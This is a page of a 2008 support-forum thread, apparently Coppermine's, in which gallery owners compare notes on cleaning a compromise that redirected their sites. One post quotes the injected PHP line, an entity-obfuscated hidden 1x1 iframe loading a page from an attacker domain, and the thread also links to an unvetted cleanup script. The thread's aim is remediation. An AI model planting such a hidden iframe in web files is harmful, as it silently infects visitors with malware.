Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 10 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 10
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

tfischer

Quote from: capecodgal on April 14, 2008, 09:11:20 PM
Basically I want to do whatever I can to hide my galleries for the next few days/ weeks even if they need to go offline.

There has been no indications or rumors that there is additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...

-Tim

Hein Traag

No need to go paranoid people ;)

As Tim says. Update to 1.4.18 and you should be fine.

Kudos to Nibbler

ChaosCrusader

Can someone provide some clear instructions on how to sanitize your site?

From what I can gather this exploit went after the config and template files for Coppermine and Simplemachine forums.  I've checked my site and removed the upload and update files, removed the files uploaded by the exploit and removed and replaced the template and config files with backups.  Is there anything else I need to do?

capecodgal

Quote
There has been no indications or rumors that there is additional immediate vulnerabilities beyond what was closed in the 1.4.18 security release.  Upgrade, sanitize, and cross your fingers...

-Tim


Quote from: Hein Traag on April 14, 2008, 09:46:47 PM
No need to go paranoid people ;)

As Tim says. Update to 1.4.18 and you should be fine.

Kudos to Nibbler

Thanks guys for the advice... LOL I agree I went into a panic this morning when I saw it hit all of my sites; but believe I understand where they (moddys) are coming from in wanting to get it right to fix it; I work w/ a software company and I know we can't get our developers to fix anything if we can't tell them where its broken- no need to look through 10,000+ lines of code it would take them ages; so yes I totally understand and appreciate what the developers of cpg are trying to do here and only get valid info...... problem is those of us that are not coders don't know the difference and I knwo they can't teach us what is and what isn't LOL - but I am thinking the update.php may be part of it after re-reading the multiple pages in this thread if that how the attack originally gets the table names....

I can't get into my ftp or run the new upgrade until I am at home later tonight but here is what I am finding (sorry no logs or anything on this to support it just what I have seen and I apologize if its useless info but if it helps anyone I consider it worth posting so advance apologies to the moddys if this is indeed useless info)

Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)


<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?>


So those of you that don't know what to do:

#1 ask your host to restore your entire website it is the safest and best way to be sure all malicious code is gone OR if you do not have backups then unfortunately you are like me and will have to salvage what you can start looking at the php files in cpg and if its the same type of attack look for a line of code like what I posted above; mine were located at the very end of the php file after all coppermine code- just be sure not to delete anythign else you don't know what it is

#2 upgrade your galleries to the latest release (.18 is it I think)

#3 Be sure you do not give more access to your files than you need to; I have a bad habit of chmodding to 777 when I upload file batches and I forget to set it back when I am done to 644 or 755
*** I say this because chances are thats how this loser was able to get in my sites was because of my own stupidity with the permissions- interestingly enough ALL of our sites on Windows servers have not been effected by this hacker as chmod is a unix command and permissions are set manually in the OS with Windows instead of through FTP like on a unix/ apache server - for once in my life I am seeing Windows be the safer option which I find unbelievable but it explains alot (IMHO) as I know how hosting via Windows works and all permissions are preset and not changeable via the ftp


foulu

Hi,

I make a php file that can sanitize the addition data from php & html file that infected with iframe things. I create it to use on one of my working site but I think release it will help more people. The script is simple, just check current folder and all sub folder for .php & .html, loop to find infect string in those files and then remove it. Anyway, use it with own will, I will not take any responsibility if you damage your site when using it.

I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

update: change some function to make the cure script run successful in more case.
update: add new url for download http://kak.amfcvn.net/files/cure.txt

François Keller

Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

ChaosCrusader

Quote from: capecodgal on April 15, 2008, 12:45:53 AM
Here is the bit of code I found that I am removing now (it is in every single php file in cpg and outside from what I am seeing)


That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?

I'll go through my cpg files to double check.

NoviceScotty

Hi guys -

being mildly annoyed by the fact that my web site was taken down and it would seem at least one computer rendered unusable by the stuff that was downloaded from the redirection (I'll post again if I ever get it repaired - it keeps running iexplore.exe svchost.exe and crashing)
I reported the cdpuvbhfzz to my local authorities (I'm in Switzerland).
Maybe you could all do the same in your countries. It probably doesn't do much good, might it might make you feel a little better.
The replies weren't very helpful, but rather than shouting at each other, better to light a candle than complain about the darkness, as I'm sure someone must have said.

>Many thanks for your query with the Reporting and Analysis Centre for Information Assurance (MELANI) of the Swiss Federal Police.
They went on to say it was my own fault for not keeping my web site updated, but at least they looked at it.

>We are happy to let you know that Cybercrime Coordination Unit Switzerland (CYCO) has received your message
> thank you for your cooperation. CYCO will verify your announcement, undertake the necessary steps and, where appropriate, contact you again.


Nibbler

Quote from: ChaosCrusader on April 15, 2008, 10:48:57 AM
That's strange.  I only found it added to the template and config files.  Once I removed it from there it doesn't show up on any of my pages (as far as I can tell, by viewing the source).  Could it be that the exploit was used in different ways?

I'll go through my cpg files to double check.

The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.

ChaosCrusader

Quote from: Nibbler on April 15, 2008, 11:14:40 AM
The malicious code can only be added to files that have permissions set to be writable. The people with the biggest problems are those who had their entire site writable, so many more files were infected.

Ah, that explains it.  Would it be a good idea to change the permissions for the theme folder to exlude write permission?  Would it cause any problems with Coppermine?

Nibbler

The only things that need to be writable are those mentioned in the docs - albums directory + subdirectories and the include dir (during installation only). Everything else should be read only.

dgeo

A little shell (/bin/sh) script to clean up that... Not better than capecodgal's one but very simple to use if you have shell access or /bin/sh cgi capabilities.

Use it on your web's root.

Joachim Müller

As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim


François Keller

Woaw Joachim great work, Thank's for this awesome job. (i'll see to translate this for the french board)
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

capecodgal

Quote from: Joachim Müller on April 15, 2008, 04:58:28 PM
As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site. I have started a thread named "Yikes, I've been hacked! Now what?" and locked it on posting to avoid it from getting cluttered similarly to this one. HTH

Joachim


THANK YOU very much for all of your hard work - it is much appreciated Gau Gau  ;D

marian

Quote from: Joachim Müller on April 15, 2008, 04:58:28 PM
As suggested I have tried to come up with an article that explains how to thoroughly sanitize your hacked coppermine-driven site.
Great stuff.

AnnieBarlow

Is update.php admin only?

I'm 99% sure that I've upgrade one gallery to 1.4.16 without logging in

steveeh131047

Joachim: Thanks so much for this - you're a hero  :)

Nibbler: And thanks to you for the work on v1.4.18

Pascal YAP

WoWWoar !
Joachim Terrible ;D
Like Thu's cats, you have seven lives, 7 heads, 7 keyboards  ;D

@François
About our Fr Board, you'll start and i'll finish ?  ;)

PYAP